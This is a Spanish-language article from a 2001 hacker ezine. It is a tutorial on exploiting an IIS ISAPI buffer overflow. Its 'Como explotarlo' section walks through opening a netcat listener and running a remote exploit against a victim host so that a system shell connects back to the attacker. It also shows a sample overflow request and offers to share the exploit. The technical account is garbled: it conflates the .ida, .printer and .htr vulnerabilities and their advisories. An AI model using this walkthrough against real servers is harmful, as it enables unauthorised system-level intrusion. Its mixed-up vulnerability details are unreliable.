

                             - D I S I D E N T S - H A C K  J O U R N A L -

                                               Numero 2
                                                 XXII









 					     TITLE: EXPLOTAR EL ISAPI BUG 
                                             Author: ZeRo-DivI 
                                             DISIDENTS ESPAA 2001 -  LOS FUERA DE LA LEY







                  _______________________________________
                 /*                                    */
                /*   -Explotar el ISAPI bug           */ 
               /*                   -By ZeRo-DivI    */ 
              /*____________________________________*/ 



         INDICE
        -------- 
 1.Introduccion 
 2.Que es?
     2.1.Tecnicamente
     2.2.Traduccion 
 3.Primeras reacciones
     3.1.De eEye
     3.2.De Microsoft
     3.3.Del resto
 4.Como explotarlo
     4.1.Herramientas
     4.2.Manos a la obra
 5.Lugares donde informarse
 6.Despedida







 INTRODUCCION
 ------------

 Bueno, lo que voy a intentar con este texto es mostraros todo lo que se sobre
 este bug de nt, explotarlo, arreglarlo, lugares donde documentarse...
 Este bug fue descubierto por eEye, que imediatamente aviso del problema a microsoft,
 y stos a su vez sacaron un parche muy tardio que no puedo evitar un gran numero de
 ataques, pero bueno esto ya es parte de las primeras reacciones.



 2.QUE ES?
 ----------

 2.1.Tecnicamente


 Para empezar, debeis sabes que isapi es un filtro k poseen todas las versiones de Internet
 Information Server, y que en este reside el problema.Este filtro es el encargado de
 controlar los limites de los datos introducidos por los usuarios, pues bien, el isapi k
 poseen los archivos con extension .ida (Indexing Service) no realizan las comprobaciones
 adecuadas, por lo k el server resulta vulnerable a un atake de  desbordamiento de bufer.
 Cualkier persona que consiga explotar el bug consige acceso de sistema a cualquier windows
 NT 4.0,Windows 2000, o Windows XP con IIS como servidor web.Con este nivel, el atacante
 puede acer lo k kiera dentro del server, por ejemplo aadir usuarios, ejecutar programas
 eliminar bases de datos... y muchas kosas mas k pueden traer de cabeza a cualquier admin.

 Este es un ataque tipico de desbordamiento de bufer:

 GET /NULL.ida?[buffer]=X HTTP/1.1

 Donde [buffer] tiene un tamao aproximado de 240 bytes.


 2.2.Traduccion


 Pues lo que todo lo de arriba significa es lo siguiente:
 Todos los IIS tienen un fayo bastante gordo que provoca que kualkier persona que tenga unos minimos
 conocimientos, y el xploit adecuado pueda entrar en un server y liar una buena, o simplemente
 limitarse a avisar, cosa que por desgracia no ocurre muy a menudo.



 3.PRIMERAS REACCIONES
 ---------------------
 
 3.1.De eEye
 
 
 Teneis que saber que eEye es una compaia de seguridad muy importante, para enteraros de lo q va 
 la kosa.Bueno, pues el equipo de eEye fueron los que descubrieron el fayo, y los que avisaron a 
 microsoft.Una semana despues de avisar a microsoft, y viendo que estos no tomaban cartas en el 
 asunto, los de eEye decidieron sacar el problema a la luz, y despues de unos dias un xploit 
 para xplotar el bug, y a su vez un parche para arreglarlo.El parche de eEye trataba consisitia en 
 limitar las peticiones de archivos htr a 255 caracteres, y guardar en un log la IP del atacante que 
 intentaba la sobrecarga, eEye reconocio que no era perfecto, pero si mas seguro que las recomendaciones
 que poco antes habia echo microsoft.


 3.2.De Microsoft


 Nada mas recibir la noticia, microsoft empezo a estudiar el fayo, o por lo menos es lo que deberia 
 de aber echo, pero no saco a la luz el bug, y menos presento un parche para arreglarlo.
 Al ver que eEye desvelava el bug, microsoft lo unico que izo fue criticar a la compaia, y recomendar 
 a los usuarios de IIS que eliminaran el filtro isapi, cosa que perjudicaria al servidor.Al final, y 
 y con bastante retraso microsoft presento un parche que solucionaba el problema sin cambiar las 
 funcionalidades de los IIS.
 
  
 3.3.Del resto


 La noticia, tuvo dinstintas opiniones, algunos usuarios se sorprendieron del tremendo error, otros que 
 ya estaban aconstunbrados se limitaron a parchear, y aunque parezca raro, muchisimos admin de IIS no han 
 parcheado porque ni siquiera saben de este bug.De cara al hack, la noticia fue tomada como una forma mas
 de meterse en un server, eso de cara al hack, pero de cara al lameruzeo a sido una forma genial de ir
 jodiendo servers a diestro y siniestro.Las empresas de seguridad, se limitaron a dar informacion 
 detallada del bug, pero no sacaron ningun parche.

 

 4.COMO EXPLOTARLO
 -----------------

 4.1.Herramientas

      
 Antes de comenzar a explicaros que hay que acer y to eso, debereis saber que hay dos programas que 
 teneis que tener para poder explotar el bug.Estos dos programas son el netcat (nc.exe), y un xploit remoto.
 Los dos vendran con la revista, de todas formas no es muy dificil conseguirlos por la red. 
  
     
 4.2.Manos a la obra


 Bueno, pues una vez tengamos estos dos programas lo primero que aremos sera abrir una ventana de ms-dos,
 y ejecutar el netcat con el komando -l -p 100 -vv , vamos que lo que hay k poner es:
 
 nc.exe -l -p 100 -vv
 
 y os respondera asi:
  
 listening on [any] 100 ...

 Esto provocara qu el netcat se quede esperando una conexion al puerto 100.Una vez echo esto abriremos
 otra ventana aparte tambien de ms-dos, esta para ejecutar el xploit.Si ejecutas el xploit sin mas, t
 pondra algo asi:

 iis5 remote .printer overflow.
 dark spyrit <dspyrit@beavuh.org> / beavuh labs.
 Usage: C:\xploit.exe <victimHost> <victimPort> <attackerHost> <attackerPort>

 Todo esto quiere decir que para usarlo hay que proporcionar al xploit un host victima, el puerto al que 
 lo vas a ejecutar, tu host, y el puerto tuyo k vas a utilizar.
 En resumen:

 xploit <hostvictima> <80> <nuestra_ip> <100>

 Supongo que abreis caido para que ponemos 100, para los que no os recuerdo que antes dejamos el netcat escuchando 
 a ese mismo puerto, pa ver si pasaba algo, pues bien, si el server al que as ejekutado el xploit es vulnerable, en
 menos de 5 segundos os aparecera su C:\winnt\system32\ en vuestra ventana de ms-dos, si por el contrario, no lo es
 os saldra algo asi:
 
 iis5 remote .printer overflow.
 dark spyrit <dspyrit@beavuh.org> / beavuh labs.
 
 Connected.
 sent...
 tou many need to send a carriage on your listener if the shell doesnt appear.
 have fun!



 LUGARES DONDE INFORMARSE
 ------------------------


 HispaSec: http://www.hispasec.com/unaaldia.asp?id=232
 Parche de eEye: http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
 Aviso de eEye: http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
 Boletn de Microsoft: http://www.microsoft.com/security/bulletins/ms99-019.asp
 Aviso del CERT: http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html
 CNet: http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni
 Parche de microsoft para Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
 Parche de microsoft para Windows 2000 Professional, Server y Advanced Server: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 



 DESPEDIDA
 ---------
 

 Bueno, solo quiero deciros que no seais muy critikos con este texto, puesto que es el primero que escribo para 
 la ezine.Espero que os sirva de mucho y que aprendais algo con el, y tambien que no lo utiliceis para joder 
 servidores.
 Ah otra kosa, si conseguis este texto de otra forma que no sea a traves de la ezine, me podeis
 buscar por el irc, y no me importara pasaros el netcat o el xploit.

 PD: un saludo a la gente de #disidents #hack_escuela #hackademia  #orglacurva #seguridad #bandaancha  #la_mafia ... 


 
 
  
 
 

 
  
 
 
 
 
 
  
  
  
  
   
        
  
    
  
 
 
 
 
 
          